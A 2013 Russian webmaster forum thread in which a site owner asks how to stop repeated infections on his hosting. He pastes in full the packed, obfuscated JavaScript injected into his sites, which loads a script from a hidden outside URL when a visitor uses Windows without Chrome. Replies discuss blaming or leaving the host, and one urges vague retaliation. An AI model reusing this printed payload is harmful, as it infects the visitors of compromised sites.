Где и как позакрывать дыры от вирусов на хостинге?

(Ответов: 4, Просмотров: 661)
  1. Гуру Аватар для Zevss
    • Регистрация: 24.03.2008
    • Сообщений: 737
    • Репутация: 100
    • Webmoney BL: ?
    Периодически на хостинге заражаются практически все сайты, смс: вп, дле, джумла.
    Предполагаю, что очень серьезного на сайтах ничего нет, так как вебмастера Я и Г уже бы написали.
    Сидит какая-то хрень, я все удалю, а оно снова в сайты гадню подсаживает.
    вот скрин, что было:


    Все файлы имеют расширение js.
    Во всех одинаковое содержание:
    Код:
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d A(l){H(e.t&&e.G){5 s=e.G(\'1g\')[0];5 f=e.t(\'1h\');f.p(\'1i\',\'1j/1f\');f.p(\'l\',l);5 1e="=1a[<}8~j;%%]";5 1b="&4; y}[={4]";5 1c="1d/1k$#k]1l~z{1s:1t";5 19="%#1v=1r+3:%>1q";5 1m="X(^~1n{[1o@1p&1w-{W[";s.R(f)}}d E(){m x.O()}5 T="}0@U;N`)I)*]%$J";5 M="6]2(P}7-18=.h 14";5 15="b`~+2*u?+16@";5 17="13$12[Y$+";5 V="*Z=.q`10{11";d v(c){m c.r(o)!=-1}5 1u="4,*@`n+S[/*25";5 1x="C^1X?K * L";5 1W="9]+;20+*{*>$+)*21-1Z";5 1Y="[w=23;$22";5 27="26($24]2[i?.>}!a}";5 B="1U://1E.1F.c/1G";5 o="o";5 1H="1V]6:1D}!1C";5 1y="1z(}0}#@g`0[1A%1B*b";5 1I="4]%?1J^`~1Q<~4&4[1R*Q ";5 1S="1T(1P";5 1O="+~,& 1K!3`!(Q*/";d D(c){m c.r("1L")==-1}d F(){5 c=x.1M.1N();H(D(c)&&v(c)&&E()){A(B)}}F();',62,132,'|||||var|||||||ua|function|document|script_tag||||||src|return||win|setAttri
    bute||indexOf|head_tag|createElement||isWin||navigator|||includeJavascript|url||n
    otChrome|cond3|includeCounter|getElementsByTagName|if|oJTM7|pr|||bDyWnY1|UxJ|java
    Enabled|xX||appendChild||bDyWnY0|tk|bDyWnY4|||abX|o5|RJ|Zme_|Pg|311|0Xf|bDyWnY2|u
    6|bDyWnY3|rX|eqCaxYl3|O0BnA|eqCaxYl1|eqCaxYl2|81|eqCaxYl0|javascript|head|script|
    type|text|Tm|l2|eqCaxYl4|6Z0a1|0p|bEc|MhW|KR6|uS|kS|BzqqE0|33|F9|BzqqE1|DtqGo1|7K
    |rVDlg|6P|zi8|k4ld2|exaxad|pp|b23e441d405961897c09b2c9c9a2cdfcb23e441d405961897c0
    9b2c9c9a2cdfcb23e441d405961897c09b2c9c9a2c|DtqGo0|DtqGo2|w6l|N3|chrome|userAgent|
    toLowerCase|DtqGo4|OP|lE|QS|DtqGo3|tj4o0kk2|http|CX0|BzqqE2|5W|BzqqE3|5IG|Ct|92|6
    Gr|x9YO|Ia8|57P|UtVM|BzqqE4'.split('|'),0,{}))
    http://megaslesar.ru/ | http://dverportal.ru/ | http://buresh-art.ru/
    Недорогой хостинг ∞ сайтов, 32Гб места! От 60 руб.
    • 0
  2. Опытный Аватар для Gradus
    • Регистрация: 03.11.2013
    • Сообщений: 484
    • Репутация: 51
    Zevss, Если дело именно в хостинге и там не хотят устранять недостатки .. то остается только одно сменить хостинг .. Вам не дадут таких прав доступа чтобы закрыть дыры ...
    (как вариант просите телефон хозяина хостинга ) Под любыми предлогами .. мол хотите заключить контракт на аренду ... итп а там уже вываливайте ему все как есть .....

    Помните старую Славянскую мудрость ..Око за око ..
    Раз работникам хостинга на Вас плевать то и вам на них ...жгите

    3s777недавно описывал аналогичную проблему на форуме .. Ему удалось ..поймать за руку..хостинг они признали что дыры были в их обороне ..... Дали ему компенсацию небольшую .... а всех остальных с аналогичной проблемой пробрили ...упав на мороз .....
    Последний раз редактировалось Gradus; 30.11.2013 в 13:18.
    • 1

    Спасибо сказали:

    3s777(30.11.2013),
  3. Гуру Аватар для Zevss
    • Регистрация: 24.03.2008
    • Сообщений: 737
    • Репутация: 100
    • Webmoney BL: ?
    Gradus, переписка:

    если вы "чистите" но не устраняете пути попадания этих вирусов то они будут появляться у вас постоянно
    если в любом из ваших сайтов есть шелл или бэкдор
    то хакер может внедрить код в любой из ваших сайтов

    если ваш движок обновлён это ещё не всё
    шелл мог быть внедрён ранее или быть встроен в тему сайта или в плагин
    http://megaslesar.ru/ | http://dverportal.ru/ | http://buresh-art.ru/
    Недорогой хостинг ∞ сайтов, 32Гб места! От 60 руб.
    • 0
  4. Гуру Аватар для 3s777
    • Регистрация: 09.02.2013
    • Сообщений: 1,417
    • Репутация: 384
    • Webmoney BL: ?
    Zevss,
    Цитата Сообщение от Gradus Посмотреть сообщение
    недавно описывал аналогичную проблему на форуме
    Возможно вам поможет мой небольшой опыт Уязвимость сервера или как доказать хостеру, что он не прав.
    • 0
  5. Sapienti sat Аватар для brainix
    • Регистрация: 01.01.2013
    • Сообщений: 1,925
    • Записей в дневнике: 1
    • Репутация: 817
    • Webmoney BL: ?
    Zevss, что у вас за чудо хостинг? Проблема за проблемой.
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Помогите закрыть дыры в Dle 9.2
Консультации по безопасности 1 02.09.2013 13:12
Оцените генератор мемов Memino.ru (юзабилити, глюки, дыры)
Оценка ваших сайтов, блогов 15 18.04.2012 00:20
Вопрос на счет вирусов=)
Вопросы от новичков 5 17.03.2012 16:18
Чистка от возможных вирусов
Прочее 21 31.08.2011 13:54

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры